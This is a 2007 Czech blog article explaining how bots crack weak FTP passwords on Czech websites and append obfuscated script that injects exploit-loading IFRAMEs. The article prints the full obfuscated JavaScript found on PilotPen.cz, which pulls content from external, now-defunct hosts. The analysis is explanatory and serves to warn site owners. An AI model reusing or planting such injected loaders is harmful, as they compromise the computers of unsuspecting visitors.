Pravidelný občasník originálního humoru

Proč ZemePohadek.cz stále obsahuje kód viru? A proč je tomu tak u dalších webů?

Autor chlívek (Webdesign, Internet) - vydáno 26.11.2007

Princip je velice jednoduchý. Robot prohledává internet a snaží se dostat k souborům webových serverů. Prolomení hesla do FTP poslouží dokonale, protože potom už stačí pouze změnit HTM/HTML dokumenty.


Proč je ZemePohadek.cz blokovaná Google vysvětluje velkou záhadu, proč je ZemePohadek.cz označená jako nebezpečné stránky a Google na ně nedoporučuje vstupovat. Ještě větší záhada je ale něco jiného. Dny plynou a web (který prý s Taťánou LeMoigne nemá žádnou souvislost), stále obsahuje kód, který tam nemá co dělat.

ZemePohadek.cz v tom samozřejmě není sama. Například PilotPen.cz je dalším zářným příkladem (vy co sbíráte škodlivý kód, spěchejte, je jiný než u ZemePohadek.cz). Provozovatelé tohoto webu už dávno vědí, že jejich stránky mají podstatný přídavek, který se snaží  hacknout počítače návštěvníků. Zjevně jim to nevadí. A to i přes to, že oba zde jmenovaní o tom vědí.

Horší to bude s množstvím webů, kde jejich správci/vlastníci vůbec netuší, že jejich vlastní web může způsobovat problémy. Setkávám se s tím stále častěji a v drtivé většině případů je na vině FTP s nedostatečným heslem, které se robotům na zavirovávání webů podařilo poměrně snadno prolomit. Ve výjimečných případech došlo k využití nějakého děravého software.

Princip napadání

Princip je velice jednoduchý. Robot prohledává internet a snaží se dostat k souborům webových serverů. Prolomení hesla do FTP poslouží dokonale, protože potom už stačí pouze změnit HTM/HTML dokumenty.

Změna spočívá v doplnění lidsky nečitelného kódu na konec souboru, zpravidla tedy za </HTML> značku. Vždy jde o skript, který vytvoří požadovaný škodlivý kód - tím je většinou IFRAME, které umožňuje natáhnout další kód z jiného webu.

Návštěvník napadeného webu pak zpravidla netuší, že se něco/někdo pokouší využít bezpečnostních děr v prohlížečích - nejčastějšími obětmi pak pochopitelně jsou uživatelé Microsoft Internet Explorer aplikace. Množství děr, které se pro tento prohlížeč nabízí, je opravdu ideální na vyzkoušení.

Chytří útočníci pochopitelně zkoušejí i chyby známé v jiných prohlížečích, ale zpravidla výjimečně. Námaha se příliš nevyplatí, přeci jenom uživatelů MS IE je stále většina a do pasti padají poměrně snadno.

Takhle například vypadá kód z PilotPen.cz :

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Efunction%20Js%28Pp%29%7Breturn%20Pp%7Dtry%7Bfunction%20BOR%28oyk%29%7Breturn%20parseInt%28oyk%29%7Dvar%20WDZ%3D%27AAEASEABEAdEAXEAPEAyEA5EACEAiEA3EAtEAJEA6EAkEAjEAREAGEAzEAZEAr
EAFEAYEAHEAUEA9EAMEA7EA8EATEAeEAcEADEAlEAnEAwEAoEAsEAhEA4EAIEAp
EALEAKEAfEAbEAqEAxEAOEANEAaEAWEAgEAmESAESSESBESdESXESPESyES5E
SCESiES3EStESJES6ESkESjESRESGESzESZESrESFESYESHESU%27%3Bvar%20TVu%3DWDZ.substr%282%2C1%29%2CEdI%3DArray%2819063%5E18989%2CBOR%28%2721%27%29%2C13504%5E13509%2C15149%5E15161%2C6074%5E6069%2CBOR%28%2722%27%29%2C31625%5E31643%2C8911%5E8855%2C9373%5E9373%2C5968%5E5955%2C25249%5E25257%2CBOR%28%279%27%29%2C10863%5E10793%2CBOR%28%2717%27%29%2C28795%5E28755%2C1305%5E1367%2CBOR%28%274%27%29%2C19481%5E19539%2CBOR%28%2713%27%29%2CBOR%28%2779%27%29%2CBOR%28%2729%27%29%2C20625%5E20609%2C1556%5E1555%2C17543%5E17581%2C3088%5E3147%2C25536%5E25539%2C28099%5E28129%2CBOR%28%2793%27%29%2C15224%5E15177%2C491%5E419%2C25639%5E25621%2C22920%5E22915%2CBOR%28%271%27%29%2C828%5E881%2CBOR%28%2794%27%29%2C25729%5E25809%2C14221%5E14303%2C28085%5E28131%2CBOR%28%272%27%29%2CBOR%28%2768%27%29%2CBOR%28%2730%27%29%2C7126%5E7159%2CBOR%28%2743%27%29%2CBOR%28%2753%27%29%2C11894%5E11885%2C31962%5E31973%2CBOR%28%2765%27%29%2C20948%5E20867%2CBOR%28%2762%27%29%2CBOR%28%2760%27%29%2C15149%5E15143%2CBOR%28%2748%27%29%2CBOR%28%2773%27%29%2CBOR%28%2714%27%29%2CBOR%28%2741%27%29%2C25554%5E25497%2CBOR%28%2755%27%29%2CBOR%28%2792%27%29%2C32106%5E32045%2CBOR%28%2789%27%29%2CBOR%28%2735%27%29%2CBOR%28%2723%27%29%2CBOR%28%2761%27%29%2C30463%5E30407%2C11533%5E11537%2C6460%5E6499%2C7084%5E7063%2CBOR%28%2758%27%29%2CBOR%28%2739%27%29%2C18701%5E18777%2CBOR%28%2736%27%29%2C13638%5E13657%2C32546%5E32519%2C11061%5E11097%2CBOR%28%2754%27%29%2CBOR%28%2785%27%29%2CBOR%28%2783%27%29%2CBOR%28%2781%27%29%2C8443%5E8375%29%3Bvar%20JBf%2CmFZ%3Bvar%20Uqr%2ChLF%3D%27AAASABAdAXAPAyA5ACAiA3ABAyAXAtA3AJA6AkAjARAkAGAzAtAZArAJAFAYAdAJ
AHARAUA3A9A6AJAMAYAyA9AjAZA7AFAYAdAJAJA8ASAUAJA3A9A6AJAMAYAyA9Aj
AZA7AJA8ASATASA9AyAeAXAcA9AjAHARATADA9AyAeAXAcA9AjAZAlAnAwAoAsAsAs
AsAsAZA7AJAhAtABAiAcA9A3AyATABAtAtAzAXA9AJAUAJARAkAlA4AUA4AlA9ASABA
YAPA9AjAzAtAZAlA4A7A9AIAPAXAdA9ASAUA4AlA8ASATAyAtApALAeAKAyAdAXA3AD
AjAZA7AJAfAFAYAdAJAkAbAUAqASAxACAPA6AqAGAcARAUAqAxAqA7AFAYAdAJAO
ANAUAqAiAPAhAYAyA9AxATABAaAYASASAXABAyA9AaATAtAdADAqAGAzAWAUAqA
gAmAyAcAaAgAqA7AXACAjAhAtABAiAcA9A3AyATABAtAtAzAXA9ATAXA3AhA9AISAA
CAjAkAbAlAqAUAqAlAcARAZAJAUAUSSAxAZArAFAYAdAJAhAaAmAUAhAtABAiAcA9A
3AyATAaAtABAYAyAXAtA3ATAmAtASAyA7AFAYAdAJAYSBAUAJAqAmAyAqAlAqAyA
PSdAqAlAqAgAgAqAlAjAJAhAaAmAJSXAUAJAqAqSPAqAqSdSyS5AjAZAZAJAlAJAhAa
AmATAdA9APAaAYABA9AJAjAgSCSiAYSSS3AsSSStATSSSJAgAGAqATAqAZATAdA9
APAaAYABA9AJAjAgS6ATAlAgAGAqATAqAZAlAqATAqAlSyS5AjAZAJAlAqATAqAJAlA
JAOANAlAzAWA7AFAYAdAJAhAaAUAhAtABAiAcA9A3AyATABAdA9AYAyA9SyAaA9
AcA9A3AyAjAqAXACAdAYAcA9AqAZA7AhAaATASA9AySkAyAyAdAXARAiAyA9AJAj
AqASAdABAqAGAJAYSBAZA7AhAaATAmA9AXADAmAyAUSjA7AhAaATA6AXAhAy
AmAUAoA7AhAaATACAdAYAcA9SRAtAdAhA9AdAJAUAJAsA7AJAyAdSGArAJAhAt
ABAiAcA9A3AyATARAtAhSGATAYAPAPA9A3AhSzAmAXAaAhAJAjAJAhAaAZA7AJ
A6AkAjAkAbAGAJAcARAJAZA7AfAJABAYAyABAmAjA9AZAJArAhAtABAiAcA9A3Ay
ATA6AdAXAyA9AJAjAqAAAmAyAcAaA5AAARAtAhSGA5AAAgARAtAhSGA5AAAgAm
AyAcAaA5AqAZA7AJAhAtABAiAcA9A3AyATARAtAhSGATAYAPAPA9A3AhSzAmAXA
aAhAJAjAJAhAaAZA7A6AkAJAjAJAkAbAGAcARAZAJA7AfAJAfSZACAiA3ABAyAXAtA3
AJSyS5AjAZArAJAFAYAdAJSzAXAUSjAoAGAbSrAUA4AsAxSjSFAoSYAwSHAnStAsA
YARABAhA9ACA4A7AFAYAdAJSyABAUA4A4A7AJACAtAdAjSGAmAUAsA7AJSGAm
AJAAAJSzAXA7AJSGAmAlAlAZAJSyABAlAUAJAbSrATASAiARASAyAdAjALAYAyAm
ATACAaAtAtAdAjALAYAyAmATAdAYA3AhAtAcAjAZSUAbSrATAaA9A3ADAyAmAZAGA
xAGAxAZA7AJAdA9AyAiAdA3AJSyABA7AJAfAAAgASABAdAXAPAyA5%27%3Bvar%20qTW%3DString%28%29%3BWDZ%3DWDZ.split%28TVu%29%3Bfor%20%28JBf%3D0%3BJBf%3ChLF.length%3BJBf+%3D2%29%7BUqr%3DhLF.substr%28JBf%2C2%29%3Bfor%28mFZ%3D0%3BmFZ%3CWDZ.length%3BmFZ++%29%7Bif%28WDZ%5BmFZ%5D%3D%3DUqr%29break%3B%7DqTW+%3DString.fromCharCode%28EdI%5BmFZ%5D%5E102%29%3B%7Ddocument.write%28qTW%29%3B%7Dcatch%28Ndr%29%7B%7D%3C/script%3E"))</script><!--[/z0s]-->

O poznání složitější, ale v principu to stejně končí IFRAME stahujícím obsah z http://pilotpen.cz.7fe714e00e9059a8f50270cc.update1.classictel.org/html/ - v současnosti adresa na které (už) nic není, stejně jako na http://cnc-inc.cn/r7e/2/s.jpg?8  .

A.U.T.O.M.A.T.I.Z.O.V.A.T

Je to tak, všechno je potřeba automatizovat. Hackerem se můžete za pár stovek dolarů stát snadno. Poslouží třeba MPack. Prostě i z hackingu je podnikání, viz Panda Software a Cybercrime... for sale (II).

Skripty staršího data bývají neškodné

Demonstrují to oba případy. Ani jeden z generovaných odkazů už nevede na funkční stránky. Je tomu tak ve většina případů, po určité době přestávají stránky fakticky realizující napadání počítačů existovat - buď šli útočníci prostě o dům dál nebo se je podařilo objevit a stránky odstavit.

Nic se ale nemění na tom, že by vlastníci napadených webů měli nežádoucí doplňky svých stránek odstranit.

 

Štítky : Hack, Exploit, Virus, Trojan, ZemePohadek.cz, Google, Bezpečnost, PilotPen.cz



|
Poslední změna : 26.11.2007 16:53, Vytvořen : 26.11.2007 14:17, Vydán : 26.11.2007, 24935x

Komentáře pro ty z Facebooku

Aktuální články autora

Související články